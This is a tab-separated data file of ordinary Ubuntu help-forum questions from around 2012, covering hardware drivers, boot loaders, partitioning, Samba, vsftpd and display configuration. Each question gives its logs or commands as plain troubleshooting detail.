200991	bluetooth not working on an alienware m14x r2	on my alienware m14x r2 laptop with ubuntu 12.04.1 x64 , the bluetooth interface is not working . wlan works fine . i have a dualboot install with ubuntu & win 7 on this laptop . in win 7 , the bluetooth interface works fine , because its all activated in bios . i have the killer wireless-n 1202 a/g/n interface with integrated bluetooth 4.0 in this laptop . here is some code : sudo rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 064e:8128 suyin corp . bus 002 device 003 : id 0cf3:3004 atheros communications , inc . bus 002 device 004 : id 187c:0521 alienware corporation dmesg | grep `` bluetooth '' [ 2.590377 ] bluetooth : core ver 2.16 [ 2.590395 ] bluetooth : hci device and connection manager initialized [ 2.590397 ] bluetooth : hci socket layer initialized [ 2.590399 ] bluetooth : l2cap socket layer initialized [ 2.590403 ] bluetooth : sco socket layer initialized [ 2.591518 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 2.591519 ] bluetooth : bnep filters : protocol multicast [ 2.599411 ] bluetooth : rfcomm tty layer initialized [ 2.599415 ] bluetooth : rfcomm socket layer initialized [ 2.599416 ] bluetooth : rfcomm ver 1.11 [ 2.696552 ] bluetooth : generic bluetooth usb driver ver 0.6 [ 2.696751 ] bluetooth : atheros ar30xx firmware driver ver 1.0 [ 2.702607 ] bluetooth : configuration file not found ar3k/ramps_0x11020000_40.dfu [ 2.702609 ] bluetooth : loading sysconfig file failed any ideas to fix that problem ?
200994	best solution for sharing external hdd	describing the problem : computer a : dual boot ubuntu 12.04 and windows7 computer b : windows7 external hdd c : on usb , ntfs formated from computer a i want to make regular back-ups in ubuntu with deja-dup on the hdd c. from both windows installations i make back-ups to c with a simple tool that copies files to a location . currently external c is mounted on a. back-ups on it are made just fine from both it 's ubuntu and windows systems . however , the back-up on b to c only works if a is logged into windows because the back-up folders from c are shared through a , so b has access to it . b does n't have access to c when a is in ubuntu . besides the point that i have n't managed to convince samba to share the external c so that b can see it ( i am currently working on that : ) ) , i am thinking if this is even a feasible solution . because b will have an automated back-up system that will work if a is in windows , but if a is in ubuntu the samba shares will be different , so i am not sure the system will recognize it correctly . i do n't want to buy a nas adapter for c , because that solution is pretty expensive ( around 70-80 euro for a usb 3.0 adapter , and that is half the prise of an external network capable drive ... ) i was thinking that a better solution would be to mount c to the sole windows machine b . the back-ups for b will be fine , and for a while it is in windows should also be fine . if a is in ubuntu , samba should fairly easy detect c through b so i could set up an automated mount on that location at every log-in . what do you guys thing ? hope you managed to bare with me till the end : ) p.s . : of course this solution assumes a and b are powered in the same time . cheers
200995	is it possible to update my graphic card drivers ?	this is what the lspci -v command shows in the vga compatible controller section : 00:02.0 vga compatible controller : intel corporation atom processor d4xx/d5xx/n4xx/n5xx integrated graphics controller ( prog-if 00 [ vga controller ] ) subsystem : dell device 048e flags : bus master , fast devsel , latency 0 , irq 44 memory at f0200000 ( 32-bit , non-prefetchable ) [ size=512k ] i/o ports at 18d0 [ size=8 ] memory at d0000000 ( 32-bit , prefetchable ) [ size=256m ] memory at f0000000 ( 32-bit , non-prefetchable ) [ size=1m ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915 i915 is only compatible with opengl 1.4 and can not use shaders and i 'd like to use some open gl 2.0 functionalities . is it possible to update the drivers or is my hardware limited to opengl 1.4 ?
200999	where is the muktware ubuntu manual installed ?	i installed `` muktware ubuntu manual '' using the ubuntu software center . there is no indication how to open and read the book . how do i find it on my system ? should n't there be something on the launcher ?
201000	failed to download repository information in update manager	details w : failed to fetch *http : //ppa.launchpad.net/jonls/redshift-ppa/ubuntu/dists/precise/main/source/sources 404 not found , w : failed to fetch *http : //ppa.launchpad.net/jonls/redshift-ppa/ubuntu/dists/precise/main/binary-amd64/packages 404 not found , w : failed to fetch *http : //ppa.launchpad.net/jonls/redshift-ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . whats causing this and how to fix it ? ty regards
201005	how to make firefox windows style less space consuming ?	firefox takes up so much space on small screens , so i 'm searching for solutions that make firefox ' interface less space consuming on ubuntu 12.04 with gnome3 . good examples are the chromium-style , but chromium is kind of slow in gnome3 . chromium does it , firefox on osx does it . is this also possible on ubuntu via a custom modification or something ? here a screenshot of what i am thinking about : firefox on osx : https : //wiki.mozilla.org/images/5/50/firefox-4-mockup-i06- % 28osx % 29- % 28tabstop % 29- % 28persona % 29.png thanks for your help .
201007	ubuntu & kubuntu in same drive	i have ubuntu in one of my drives . can i install kubuntu in that same drive . i am already having a dual boot system . will it effect mbr ? ?
201009	xubuntu vs xfce in ubuntu issue	after installing xubuntu from its own iso , the desktop is slow to load up after putting in name and password . after installing ubuntu , and then install xfce through terminal , and deleting unity , there is no slowdown . please note , the slowdown only starts after the recommended updates are applied , not the required ones .
201016	where to download broadcom sta .deb file ?	situation : i do n't have wireless access through ubuntu due to needing the broadcom sta driver for my wireless card . i do n't currently have access to a physical ( cabled ) connection that will allow my ubuntu machine access . ( security reasons , no unidentified machines . ) where can i download a .deb file for the broadcom sta driver ? i 'm not asking how to install through jockey-gtk ( the `` additional drivers '' menu option ) or through synaptic . thank you in advance for any assistance . update : the answer worked beautifully in an older version of ubuntu that included gdebi ( an installer for .deb files . ) however , in my 11.10 install , the software center churned and churned with no apparent results . has anyone else tried this in an 11.10+ version , and did software center work for you ?
201026	usb sticks and cards have all become read only	for no apparent reason my desktop machine running ubuntu 12.04 suddenly will not allow me to write to or create files/folders on any usb drive ( memory sticks and cards ) . all work perfectly in my laptop running exactly the same system . i 've checked all the usual ideas - it is not locked , i have formatted it on both machines and only the one machine has the problem . i 'm not an experienced user so keep it as simple as possible please !
201027	dpkg -- set-selections fails in 64-bit computer	i found a set of commands that creates a list of installed packages on a machine , and then reinstall the same packages in another machine . it seems that the command works fine on ubuntu 32bit desktop , but on ubuntu amd64 ( desktop ) the command sudo apt-get dselect-upgrade tells me that i need to uninstall a lot of packages ( including unity , unity-2d , unity-common ) even if these packages appear in the list of installed packages in the first system . even if these commands are inputted in sequence on the same computer , they work fine in a 32 bit environment but seems to fail in a 64 bit environment . may be i missed something . here 's the commands in sequence : sudo dpkg -- get-selections > installed-software sudo dpkg -- set-selections < installed-software sudo apt-get dselect-upgrade
201030	gksu not working	gksu nautilius running the above or trying to run the nautlius script -'browse as root ' gives the following error /home/borax12/.gtkrc-2.0:6 : error : scanner : unterminated string constant ( gksu:3914 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , segmentation fault ( core dumped ) sudo seems to work fine , but why is the gksu password prompt not working , the moment i type a letter in the passowrd prompt box , it exits and give the above error .
201033	boot in virtual console mode with full resolution	i am able to either : 1 ) boot into x , switch to virtual console # 1 and use it at full resolution or 2 ) boot into virtual console mode -only and use them with 80 columns max how can i boot into virtual console mode and use the maximum framebuffer resolution ?
201038	is running latest firefox on older versions of ubuntu possible ?	is running latest firefox ( ver . 16 ) on ubuntu 8.04 possible ? if so , what do i need to do to accomplish this ? ( if i can keep that latest support firefox 3.6.17 alongside the latest firefox 16 , that 's even better )
201040	pls , how can i expand my ubuntu partition ?	i wish to expand my ubuntu 12.04 partition . pls help ?
201042	how can i add a back button to my web browser using web kit and quickly and how add a google search bar ?	i tried a bunch of different codes but am still not able to add a back button or add a google search bar .
201046	is hardware support for the lenovo g580 laptop really that bad ?	i am planing to buy a lenovo g580 ( 59-324061 ) laptop . i found it is the best laptop in that price range . however , if i google it for support in ubuntu , i see many people complaining about driver problems with ubuntu 12.04 . i 've read about wired network problems and brightness control issues with ubuntu 12.04 . please advice me about this purchase and help me whether driver problems actually still exist .
201049	continuing problems with vnc logs	i had an issue several months back with vnc writing several lines to the xsession-errors log . ( here 's the link ) . i got rid of the log and go it working , but every couple weeks , i 'd have the exact same issue . kind of annoying , but i delete the log , restart machine and i 'm running again . i finally figured out how to send that log ( which contained nothing else ) to /dev/null . worked great . today , i had the same problem again ! only instead of the xsession-errors file , the logfile in question was in my .vnc directory . again , it 's logging the same line `` am authentication deferred - ignoring client message '' several thousand times per second until the log fills up . i ca n't find anything online regarding this error . any ideas what the root cause of this might be ? thanks for any ideas !
201055	installed 12.04 64bit have screen flicker	hey i installed ubuntu and the screen flickers or just a black screen with a little flicker at the top . i 'm really new to this stuff . help is appreciated . specs : processor : amd-fx quad core 4170 4.2ghz motherboard : gigabyte 970 a-d3 graphics card : gigabyte amd radeon hd 6670 ram : 8gb
201058	copy from one folder to another not working in terminal	i 'm new to ubuntu . i installed it because i 'm using it in my operating systems class in college . one thing needed to do is copy . this is the lecturers notes on how to do this : change to your home directory cd display a listing of the files contained within it in long format ls -al make a directory here called test mkdir test below test create two directories x and y cd test mkdir x mkdir y copy the file fstab from the /etc directory to the directory y cd y cp /etc/fstab . but it 's not working . can anyone help me with this ?
201059	does ubuntu one ( u1 ) have to be synchronised ?	i want to upload all my pictures , videos and documents to ubuntu one and then delete them off my pc and forget about them . is this possible ?
201060	`` grub rescue > '' ca n't get past this message in spite of everything ! there must be a way ?	everybody will understand this problem i think , but somebody will have the solution ( i ca n't find it on here even after searching ) . it 's a straightforward ( ! ) boot up issue ( i wish ! ! ! ! ) . i have a laptop with several partitions . one of them is ubuntu 12.04.1 , another is oracle vm , another is windows xp etc . i made an adjustment via a partition manager within xp and upon the re-boot i 've got the dreaded `` grub rescue > '' prompt ... . i can not boot from cd or usb versions of any of these ; windows xp , ubuntu 12.04.1 live , rescatux , super grub2 disk , or even boot disk , which means i 'm very unsure of how to repair / re-config the grub record or even fix the windows mbr and then sort out things from there . thanks to other posts , i can find the folder with several dozen *.mod files . so i 'm pretty sure i 'm in the right partition now ( even if it 's slightly corrupt or now in the wrong order etc ) . from `` grub rescue > '' i typed `` ls ( hd0 , msdos5 ) /boot/grub '' to find this area and this is after the `` error : unknown filesystem '' response to the other options ( hd0 ) ( hd0 , msdos6 ) etc . i have to other mac osx machines which i normally use , but i ca n't think how to solve this at all ( very limited knowledge of ubuntu to date ) . if anybody sees this and thinks they have a possible solution , i 'd be really appreciative of the commands or procedure to recover . i need the data on the disk but i am happy to re-install operating systems if needed . i 'm very sure that this is simply down to the partition mod unfortunately but i 'm sure somebody will know how to recover this ( fingers crossed ! )
201065	installed ubuntu 12.04 ( alongside xp ) cant boot into ubuntu	so i installed ubuntu 12.04 32bit alongside xp sp2 ... chose the `` something else '' option and gave ubuntu a whole partition of 48gb .. ext4 type partition .. did not give a swap space the installation was successful .. but i cant boot into ubuntu .. there is no boot menu at startup .. xp runs fine .. cant access the ubuntu drive though .. how can if fix this ? ? p.s- no internet connection !
201070	is wubi completely safe ?	i 'm a total beginner when it comes to operating systems and all things like that . i really love ubuntu but i do n't want to break my computer installing it . i want to install wubi and i was wondering if it is completely safe ( my computer is pretty rubbish , it needed repairing after i installed universal theme patcher ) . i want ubuntu so my computer will run quicker , that is the only reason , i am not a developer or anything like that i just love how ubuntu looks and , runs but i want to keep windows 7 . i have a compaq hp laptop . ( i do not know the model name ) , amd sempron m100 processor ( 2.00 ghz ) , 2 gb of ram windows 7 home premium
201071	wifi not detected in dell inspiron	i have ubuntu 12.04 installed in my dell inspiron 15r laptop but the wifi is not enabled i have tried some solutions but it has not worked till now when i use the lspci -vvv comand i get 08:00.0 network controller : broadcom corporation device 4365 ( rev 01 ) subsystem : dell device 0016 `control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 11 region 0 : memory at c1500000 ( 64-bit , non-prefetchable ) [ size=32k ] capabilities : < access denied > ` the command lspci -vvnn | grep 14e4 gave this output 08:00.0 network controller [ 0280 ] : broadcom corporation device [ 14e4:4365 ] ( rev 01 ) one of the threads also gave a .deb file to install which gave me an error though i am unable to locate that thread now i have tried installing and uninstalling b43-fwcutter ando also installing and uninstalling sudo apt-get remove bcmwl-kernel-source sudo apt-get install bcmwl-kernel-source dosent seem to work gksu jockey-gtk also does n't show any options regarding wifi i seem to have tried a lot of things and havent kept track so so i dont know the present status of my system : ( i do not know how to use ndiswrapper . how can i get my wifi working ? thank you .
201073	is it ok to create all primary partitions . ?	i have a 320gb hard disk . i only use either ubuntu or kubuntu ( 12.04 for now ) . i do n't want to use windows or any other dual boot os . and i need only 3 partitions on my hard disk . one for the os and remaining two for data storage . i do n't want to create swap also . now can i create all primary partitions on the hard disk . are there any disadvantages in doing so . if all the partitions are primary i think i can easily resize partitions in future . on second thought i have the idea of using seperate partition for /home . is it good practice . if i have to do this , i will create 4 partitions all primary . in any case i do n't want to create more than 4 partitions . and i know the limit will be 4 . so is it safe to create all 3 or 4 primary partitions . pls suggest me , what are the good practices . ( previously i used win-xp and win-7 on dual boot with 2 primary partitions and that bugged me somehow i do n't remember . since then i felt there should be only one primary partition in a hard disk . ) edit 1 : now i will use four partitions in the sequence - / , /home , /for-data , /swap . i have another question . does a partition need continuous blocks on the disk . i mean if i want to resize partitions later , can i add space from sda3 to sda1 . is it possible and is it safe to do ? edit 2 : i have created 4partitions - ( / , /data1 , /data2 , /swap ) . the first three partitions are of type ext4 . now the /data1 and /data2 partitions have root account as owner . i must have root permissions for copying normal files to those partitions which might be little inconvenient . what should i do ? ? shall i just take the ownership of these partitions and chmod them to 644 . will this work ? `` chown user : user /media/data1 '' and then `` chmod 644 /media/data1/* '' .
201077	can not get vsftpd to work	i have installed vsftpd on my server . i am running ubuntu 12.04 lts . when i try to connect using filezilla i am getting this message : status : connection attempt failed with `` econnrefused - connection refused by server '' . i have set this in my /etc/vsftpd.conf : anonymous_enable=no local_enable=yes write_enable=yes connect_from_port_20=yes ftp allowed users list : /etc/vsftpd.chroot_list in this list i have : testuser ftp disallowed users list : /etc/ftpusers root daemon bin sys sync games man lp mail news uucp nobody in my /etc/shells i have : /bin/sh /bin/dash /bin/bash /bin/rbash /usr/bin/screen /bin/tcsh i am able to login to this account via ssh . what am i missing ? !
201081	how can i make linux behave better when edid is unavailable ?	i 'm using mythbuntu 12.04 with a tv which only provides edid information when it is turned on . since the computer will be used for recording video via mythtv , i do n't want to always have the tv on while the computer is running . i saved the edid to a file , put it in /lib/firmware , and added drm_kms_helper.edid_firmware=dvi-i-1 : lt26-a.vga.edid.bin to the kernel command line . the kernel loads edid from this file , and x starts with the proper resolution . however , the kernel still attempts to read edid from the device and spams my logs with messages like this : [ 31.926373 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 128 [ 31.927144 ] raw edid : [ 31.927352 ] ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 31.927882 ] ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 31.928454 ] ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 31.928984 ] ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 31.929513 ] ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 31.930042 ] ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 31.930569 ] ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 31.931097 ] ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 31.931630 ] radeon 0000:01:00.0 : dvi-i-1 : ignoring invalid edid block 1 . [ 31.990143 ] i2c i2c-3 : sendbytes : nak bailout . [ 31.993215 ] [ drm : radeon_dvi_detect ] *error* dvi-i-1 : probed a monitor but no|invalid edid [ 32.023802 ] [ drm ] got external edid base block and 0 extensions from `` lt26-a.vga.edid.bin '' for connector `` dvi-i-1 '' [ 32.774355 ] i2c i2c-3 : sendbytes : nak bailout . adding the drm_kms_helper.edid_firmware option also causes a long delay when shutting down or rebooting . it happens even when the monitor is on . part of it is due to all invocations of plymouth hanging for a while , probably due to plymouthd hanging . this makes scripts executed at shutdown hang for a while . not running plymouthd at shutdown helps , but there is still a delay . after the delay , i see : [ drm : edid_load ] *error* requesting edid firmware `` lt26-a.vga.edid.bin '' failed ( err=-2 ) this flashes by very quickly and is followed by the splash screen or reboot . i could only record it using a camera . it makes no sense to me because during the delay the computer was fully usable via ssh . the kernel should have been able to read the file . i do n't think this is a plymouth problem . it 's probably hanging because some video mode change it requests is hanging . however , i 'd love to be able to tell plymouth to always stay in ordinary vga text mode . i also tried drm_kms_helper.poll=0 and drm_kms_helper.poll=n kernel options . they can set the option according to /sys , but i do n't see any change from that . adding the nomodeset kernel parameter gets rid of the these issues . however , then the current version of the radeon driver in the x server does n't work properly and newer versions refuse to run . update : adding -- tty=/dev/console to the invocation of plymouthd at shutdown in /etc/init/plymouth.conf has fixed the shutdown hang , even when the tv is turned off .
201087	can not shutdown , computer freezes	i 've installed ubuntu 12.04 ( near windows 7 ) on my laptop ( dell studio xps 1640 with ati radeon hd 3670 ) and everything is working fine , but when i want to shutdown my computer it freezes ! i do n't know what to do after that , then i have to use power button to power off the computer and it 's not good at all . i do n't know what 's the problem and i do n't know how to figure this out . i installed the graphic card driver ( 12.6 version ) from ati website and it fixed my problem with playing videos but i think after that this shutdown problem appears ! would you tell me what 's the problem and how can i fix it ?
201088	ubuntu boots in read-only filesystem after upgrade !	i got a serious problem here : i recently upgraded to the latest version of ubuntu . now , i boot to my ubuntu partition , and i get a low-graphics error ! i boot to a recovery-mode to see what the problem is . then , i try to fix any damaged packages , to run fsck but nothing solved the problem . then , from the recovery menu , i open a root shell . i try to create a file and i understand that the filesystem is read-only . then , i run : mount -o remount , rw / and it worked for that terminal session ! when i go back to recovery , i select to resume boot normally but i get the same error ! a i also tried to boot to my root shell again , remount as read-write and start gnome from there . it worked ! ( but the user is root , and is quite dangerous ! ) however , i ca n't do all this proccess at every boot ! any solution ? ( note that when i try to create a new file in my ubuntu partition from another os , i do n't get any errors ! )
201089	unity 3d support for multiple x-screens	i 've installed ubuntu 12.04 this weekend and have had problems getting unity3d to work with my triple monitor set-up . i 've installed the latest nvidia drivers for my 2 nvidia video cards and have used nvidia x server settings to configure everything . if i stick each monitor on a separate x screen , all but the primary x screen will appear white and the cursor will be a black x. i can start a terminal on this screen but can not drag other windows to it . if i kill the `` nautilus '' process , the white background disappears and i see my desktop background , but my cursor is still an x and i still can not drag windows to it . if i enable twinview , i can get one screen on two monitors to work properly , but the white screen remains on my third monitor . in addition , i do n't like using twinview because my full-screen applications get stretched . my current solution is to `` enable xinerama '' , use all separate x screens and revert to unity2d . i 'd love a solution to this as ubuntu 12.10 is not planned to support unity-2d and prefer the aesthetics of 3d anyways . i can provide xorg.conf for all configurations and any other suggested diagnostic information . below is my closest-to-working xorg.conf : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 295.33 ( buildd @ zirconium ) fri mar 30 13:38:49 utc 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' rightof `` screen2 '' screen 1 `` screen1 '' rightof `` screen0 '' screen 2 `` screen2 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 1 '' endsection section `` files '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` microvitec plc mv191 '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` unknown '' modelname `` crt-1 '' horizsync 28.0 - 55.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor2 '' vendorname `` unknown '' modelname `` microvitec plc mv191 '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor3 '' vendorname `` unknown '' modelname `` microvitec plc mv191 '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 75.0 endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gts 450 '' busid `` pci:1:0:0 '' screen 0 endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 9500 gt '' busid `` pci:2:0:0 '' endsection section `` device '' identifier `` device2 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gts 450 '' busid `` pci:1:0:0 '' screen 1 endsection section `` device '' identifier `` device3 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gts 450 '' busid `` pci:1:0:0 '' screen 2 endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` dfp-0 : 1280x1024_75 +0+0 ; dfp-0 : 1280x1024 +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen2 '' device `` device2 '' monitor `` monitor2 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` dfp-2 : 1280x1024_75 +0+0 ; dfp-2 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen3 '' device `` device3 '' monitor `` monitor3 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` dfp-2 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` extensions '' option `` composite '' `` disable '' endsection other people have had similar issues . i have n't been successful at any of the few suggestions submitted . can not get dual monitors to work on different gpus http : //askubuntu.com/questions/30412/3-monitors-with-2-video-cards-not-working ? rq=1 how to get second display to work alongside primary display ? http : //askubuntu.com/questions/148007/multiple-monitors-only-work-with-unity-2d/201086 # 201086 xorg.conf and unity3d ?
201093	how do i downgrade rhythmbox v2.98 ?	i 've been testing out the new webupd8 ppa for rhythmbox which i used to upgrade from rhythmbox v2.97 to v2.98 . however , when i added this ppa , when using my favourite plugins replaygain and coverart-browser , rhythmbox crashes with a segmentation fault . worse , when this crash happens , my unity desktop becomes unstable , with various applications failing to start with similar segmentation faults . does anybody know the reason for this - but more importantly how to resolve this ?
201098	clean install with home folder and multiple users	i had reformatted my system ( unfortunately an update failed ) and had my home folder on a separate partition . thankfully i still have all of my users files ( in their respective folders ) , but there was no option to use this on install ( since my update had failed ... ) . how can i recreate the old users with their previous home directories ? ( are there problems with user permissions with just dragging and dropping the entire contents of folders ? )
201101	samba share external usb device	i managed to share stuff from my ubuntu 12.04 to my private network , and the data is visible from a windows machine . i even shared a hdd that has windows on it . so everything seems to work fine . when i want to share a mounted device ( usb pen drive , usb hdd ... etc ) however , i get from the windows machine : access denied on file \ ... i realize that this is due to the missing rights on the mounted folder . by default a mounted folder gets the equivalent of 700 : drwx -- -- -- , and the owner myself . but , i ca n't seem to change the rights on the external device ... they remain 700 . is there a special trick i need to do in order to share ntfs mounted usb devices ? thanks p.s . from this question i see that ntfs devices can not be shared ... .is this true ? it 's a bit strange , because i have in my pc 2 hdd 's with 3 ntfs partitions , and i can share them without a problem .
201103	is there a manufacturer unique identifier on a hard drive and how do i read that identifier ?	i understand the concept of a file system uuid . is there a manufacturer unique identifier on a hard drive , apart from the file system uuid , and how do i read that identifier ?
201107	my computer wont shutdown	if i try to shutdown my computer it simply takes me back to the login-screen . i looked around and found : type in terminal : sudo gedit /etc/default/grub find the line : grub_cmdline_linux_default= '' quiet splash '' change this to : grub_cmdline_linux_default= '' quiet splash acpi=force '' save the file and close the file . finally , in terminal : sudo update-grub but now there is a new problem when i try step 5 it says : *myname* @ ubuntu : ~ $ sudo update-grub [ sudo ] password for *myname* : /usr/sbin/grub-probe : error : can not find a device for / ( is /dev mounted ? ) . *myname* @ ubuntu : ~ $ i am new whit linux and dont know what to do .
201109	nagios3 error : could not read object configuration data !	i have a brand new install of nagios3 on ubuntu 12.04 . after i log in to the web interface and click any link i get the error : error : could not read object configuration data ! here are some things you should check in order to resolve this error : verify configuration options using the -v command-line option to check for errors . check the nagios log file for messages relating to startup or status data errors . i ran it with the -v option and it reported no errors : total warnings : 0 total errors : 0 things look okay - no serious problems were detected during the pre-flight check the nagios log and apache error log and debug log all have nothing regarding this . does anyone know how to turn on logging that will give me some kind of useful error ? or if anyone knows how to fix this specific problem without additional logging , i guess that 's okay too . thanks !
201118	is there a security risk with users that are also groups ?	i know a little about users and groups ; in the past i might have had a group like 'dbas ' or 'admins ' and i 'd add individual users to each group ... but i was surprised to learn i could add users to other users - as if they were groups . for example if my /etc/group contained the following : user1 : x:12501 : user2 : x:12502 : user1 admin : x:123 : user2 , jim , bob since user2 is a member of the admin group , and user1 is a member of user2 - is user1 effectively an admin ? if the admin group is in the sudoers file , can user1 use it as well ? i 've tried to simulate this and i have n't been able to do so as user1 ... but i 'm not sure it 's impossible . edit : sorry - updated error in question .
201119	resizing partitions	i have the following configuration : sda1 1 gb maybe fat32 ( windows recovery partition ) sda2 40 gb ntfs ( windows drive c ) with boot flag sda3 around 100gb ntfs ( storage partition ) sda4 extended partition : sda5 10 gb ext4 partition sda6 1 gb linux swap i want to make this changes : sda2 30 gb resize ( decrease size with 10 gb ) sda3 around 100gb ( move and maybe decrease size with 4-5 gb ) sda4 around 20-22 gb ( move and increase size with 10-15gb ) sda5 around 20 gb ( move and increase size with 10-12 gb ) sda6 2 gb ( move and increase size with 1 gb ) is it safe to do this operations ? will i lose grub ? i will do the changes with gparted on puppy linux live usb .
201120	how can i access the configuration window for easystroke gesture recognition ?	when i run easystroke gesture recognition , nothing happens ! how can i access its configuration window so i can start using it ?
201123	screen resolution stuck at 640x480 after installing bumblebee	i have a dell xps 15z laptop . as you can see here , there are some issues with nvidia drivers . the site recommends installation of bumblebee ( instructions given in the link ) . i am posting it again for ease : $ sudo add-apt-repository ppa : bumblebee/stable $ sudo apt-get update & & sudo apt-get upgrade $ sudo apt-get install bumblebee bumblebee-nvidia $ sudo usermod -a -g bumblebee $ user after restarting the computer however , the screen resolution was stuck at 640x480 and i got the following error message as soon as i logged in : **could not apply the stored configuration for monitors** none of the selected modes were compatible with the possible modes : trying modes for crtc 63 crtc 63 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) trying modes for crtc 64 crtc 64 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) prior to the update , the display was absolutely normal and thus there is no doubt about the cause . albeit , there was no support for graphic drivers . in case it helps , some features of graphics drivers seem to be functional after bumblebee , ie , all features are in order except for the resolution . and if the resolution ca n't be fixed , please suggest a way to retract the changes so that atleast the prior state may be reachieved . any help in the matter would be highly appreciated .
201126	disk burner software supporting label tag	is there a burner software that could use the label tag technology ? brasero and k3b do n't seem to have that option . i am using ubuntu 12.04 dvd burner liteon ihas524
201129	how to change boot animation ?	is it possible to change to boot animation in 12.04 ? i know it was possible on 11.10 ... if it is , how do you do it ?
201130	black screen after boot	after i choose lubuntu on my grub nothing happens . the screen turns black , the keyboard lights up like it may be doing something , but over time nothing happens . this started happening after i closed my laptop and opened it up again . now lubuntu will not boot at all .
201131	allow any user to use shutdown with my own shell	first of all sorry if my english is not excelent but it isnt my native language . i have a project where i 'm building my own shell ( named myshell ) . one of the tasks is to create my own built-in turnitoff , a command that can be executed by any user that has myshell as default shell * . the problem is that this command is only for the sudo . i read that i can edit the sudoers file but there is a problem with this : lets say that john has myshell installed . he can change to his previous shell whenever he wants ( for example bash ) . when he is in bash he is not supossed to run shutdown , but he will . hope i made my self clear ... . i dont want the answer , just a helping hand that can tell my were i can search ... thanx a lot in advance ! note : all the code is in bash no bin files allowed *the user that has myshell as shell is because someone installed it with a makefile . at this point is when we can change everything becase the makefile is run with the root user .
201133	can i use ntp service through a proxy ?	can i use ntp service through proxy ? how to do it ? i want ntp auto sync my clock through proxy .
201135	why wo n't glade let me change the button content ?	in glade , i go to add a button , and try to add a label/image ; however , the stock button and label fields are faded , and i can not add anything to them . why does it do this ? how do get glade to allow me to add content to the buttons ?
201139	how do i install .tar.gz , .tar.bz2 , and .tar.bz files ?	help ! i found a program that i really , really want , but they only have a .tar.gz file for the download , and it just opens the archive manager after i download it . what do i do ?
201146	while installing ubuntu from ubuntu desktop ( from usb )	i downloaded the ubuntu software to create a usb to install ubuntu . i rebooted my pc ( windows 7 ) , in wich i did a partition ( : e ) just for ubuntu . but when i start the installer , it says there 's no other os in my computer , and does n't give me the option to install it in : e , just the option to format the whole hard drive and install it there . what can i do ? user68186 told me to type `` sudo dmraid -e -r /dev/sda '' in the ubuntu terminal but it says : `` no raid disks with names : `` /dev/sda '' '' . i opened gparted , and in /dev/sda ( 465.76gib ) it says : partition : unallocated ; file system : unallocated ; size : 465.76gib . this is what i did : only 'sdb ' shows up when installing 12.04 on a new dell inspiron 14z . also , i tried wubi before , but it had an error with `` wubildr.mbr ''
